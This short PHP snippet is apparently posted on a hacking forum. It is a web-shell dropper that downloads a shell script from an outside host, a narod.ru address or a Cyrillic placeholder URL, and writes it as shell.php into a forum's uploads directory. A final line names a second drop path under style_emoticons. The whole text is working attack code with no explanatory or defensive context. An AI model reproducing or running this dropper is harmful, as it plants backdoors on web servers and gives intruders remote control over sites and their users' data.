$linky="http://путькшеллу.com/shell.txt"; $saved="Путь к папке /uploads/shell.php"; $from=fopen("$linky","r"); $to=fopen("$saved","w"); while(!feof($from)){ $string=fgets($from,4096); fputs($to,$string); } fclose($to); fclose($from);
$linky="http://webpack.narod.ru/shell.txt"; $saved="/home/crazy/public_html/forum/uploads/shell.php"; $from=fopen("$linky","r"); $to=fopen("$saved","w"); while(!feof($from)){ $string=fgets($from,4096); fputs($to,$string); } fclose($to); fclose($from);
$saved="/home/crazy/public_html/forum/style_emoticons/shell.php";